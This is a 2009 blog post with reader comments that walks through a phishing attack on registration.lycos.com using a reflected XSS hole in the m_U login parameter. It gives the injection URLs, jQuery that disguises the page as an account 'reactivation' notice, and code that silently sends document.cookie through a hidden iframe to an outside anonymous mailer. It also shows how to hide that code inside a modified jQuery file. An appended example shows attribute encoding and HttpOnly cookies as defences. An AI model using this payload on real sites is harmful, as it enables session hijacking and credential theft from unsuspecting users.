Saturday, May 16, 2009

Phishing With jQuery - Registration.Lycos.Com

jQuery is a wonderful tool when the need to traverse the HTML DOM arises. With only a few lines of code the layout of a web page can be drastically altered. Using an XSS vulnerability and a bit of creativity we can manipulate http://registration.lycos.com, turning it into what appears to be a reactivation page that users must visit to keep their accounts. When the user navigates to the page, the malicious code reads the cookie value and sends it to us through an anonymous mailing service. All of this happens transparently while the user waits to be redirected to http://mail.lycos.com.

First, we need the vulnerability. The m_U parameter of the login page is reflected into the form without escaping, so the following URL will work:

https://registration.lycos.com/login.php?action=login&m_PR=27&m_CBURL=http://www.lycos.com/&m_U='/><script>alert('Hello, World');</script>

Next is the jQuery. Using it we are going to alter the title and the login form, then email the cookie value by appending a hidden iframe to TestDiv. The JavaScript below fulfills these needs, mailing to you@yourdomain.com.

$(this).load(function() {
  // Change the page title and replace the login form with a fake "Activated" notice
  $('title').html('Reactivation');
  $('form').html('<div id="TestDiv"></div><h3 style="color:green;margin:">Activated</h3>Your account has been reactivated.<br />Redirecting to <a href="http://mail.lycos.com">http://mail.lycos.com</a>...');

  // Build the mailer URL, putting the cookie value in the message body
  var u = 'http://send-anonymous-email.com/Record.php?email_from=someemail%40domain.com&email_to=you%40yourdomain.com&subject=Have+A+Cookie&message=' + escape(document.cookie) + '&kind=html';

  // A hidden iframe makes the request without anything visible to the user
  $('#TestDiv').append('<iframe style="display:none;" src="' + u + '" />');

  // After five seconds, send the user on to the real mail site
  setTimeout("window.location='http://mail.lycos.com';", 5000);
});

To obscure our code and keep the URL short we can remove all unnecessary whitespace and append it to the end of the jQuery file. Doing so would look something like this:

[jQuery] $(this).load(function(){$('title').html('Reactivation');$('form').html('<div id="TestDiv"></div><h3 style="color:green;margin:">Activated</h3>Your account has been reactivated.<br />Redirecting to <a href="http://mail.lycos.com">http://mail.lycos.com</a>...');var u='http://send-anonymous-email.com/Record.php?email_from=someemail%40domain.com&email_to=you%40yourdomain.com&subject=Have+A+Cookie&message='+escape(document.cookie)+'&kind=html';$('#TestDiv').append('<iframe style="display:none;" src="'+u+'"/>');setTimeout("window.location='http://mail.lycos.com';",5000);});

Include the modified version of jQuery using the vulnerability and the result will look like the screenshot below.


https://registration.lycos.com/login.php?action=login&m_PR=27&m_CBURL=http://www.lycos.com/&m_U='/><script src="http://www.yourdomain.com/modifiedjQuery.js"></script>
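
As an added example (not code from the original post), the Node.js snippet below shows why the m_U payload above works and what closes the hole: the login form template and the cookie name are assumptions, since the real registration.lycos.com markup is not on the page. It renders the form both with plain string concatenation and with attribute encoding, and shows the HttpOnly flag that keeps document.cookie from exposing a session cookie to the script in the post.

```javascript
// Added example, not from the original post. The login form template and
// the cookie name below are assumptions; the real registration.lycos.com
// markup is not shown on the page.

// Encode a value for placement inside a quoted HTML attribute.
function escapeAttr(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

// Vulnerable rendering: m_U is concatenated straight into a single-quoted
// value attribute, so a value starting with '/> closes the tag and whatever
// follows is parsed as markup (the <script> in the post's URL).
function renderLoginVulnerable(username) {
  return "<form action='login.php'><input name='m_U' value='" + username + "' /></form>";
}

// Hardened rendering: the same template, with the value attribute-encoded on output.
function renderLoginHardened(username) {
  return "<form action='login.php'><input name='m_U' value='" + escapeAttr(username) + "' /></form>";
}

// Read m_U from a login.php URL the way the server would see it.
function extractUsername(urlString) {
  return new URL(urlString).searchParams.get('m_U') || '';
}

// True when the markup contains a real script element rather than encoded text.
function containsScriptTag(html) {
  return /<script[\s>]/i.test(html);
}

// Session cookie header with HttpOnly set: document.cookie, which the post's
// payload reads, never sees a cookie carrying this flag. Cookie name assumed.
function sessionCookieHeader(value) {
  return 'LYCOS_SESSION=' + encodeURIComponent(value) + '; Path=/; Secure; HttpOnly';
}

// The probe URL quoted in the post.
const PROBE_URL = "https://registration.lycos.com/login.php?action=login&m_PR=27&m_CBURL=http://www.lycos.com/&m_U='/><script>alert('Hello, World');</script>";
const probeUsername = extractUsername(PROBE_URL);
console.log('vulnerable markup contains <script>:', containsScriptTag(renderLoginVulnerable(probeUsername)));
console.log('hardened markup contains <script>:', containsScriptTag(renderLoginHardened(probeUsername)));
```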

18 comments:

  1. very cut and dried, easy to understand. You should be a technical writer.

  2. Ummm, thanks a lot. So now all my private emails and account data is being sent to whom? Grrr, so crazy to think I'm a person who gives lots of my own free-time volunteering in my community and helping people out, and you are doing your best to fuck people over. What a crazy shitty world.

  3. I think someone actually took your code and totally screwed up Lycos for real. Perhaps you should look into it and help them sort it all out before you get a call from about a million lawyers - especially ones from Lycos.

  4. John,

    What does this mean for all of us who are now locked out of our Lycos free email accounts?

  5. What does this mean now that we've all given away our usernames & passwords?!? Or are they only after our credit card numbers?

  6. First off, thanks to all for the feedback! Unfortunately this will not help anyone recover their free Lycos email account. As to whether the information contained in this post was used in a malicious manner, I do not know. If it was, such an occurrence would be unfortunate and I certainly would not condone the acts of the individual(s) involved. This was posted for informational purposes only. Any anger should be redirected to those that provide a premium service with gaping holes in it. Exactly what information can be compromised using this vulnerability I am unsure of; I do not have a Lycos email account.

    1. I can not agree more with you!

  7. LMAO ... that is awesome!

  8. I am, of course, a newcomer to this blog, but the author does not agree.

  9. January 16, 2011 and the security problem is still there!! Glad I don't have a Lycos account!

  14. Nice to meet you, boss. Just out for a morning stroll here.
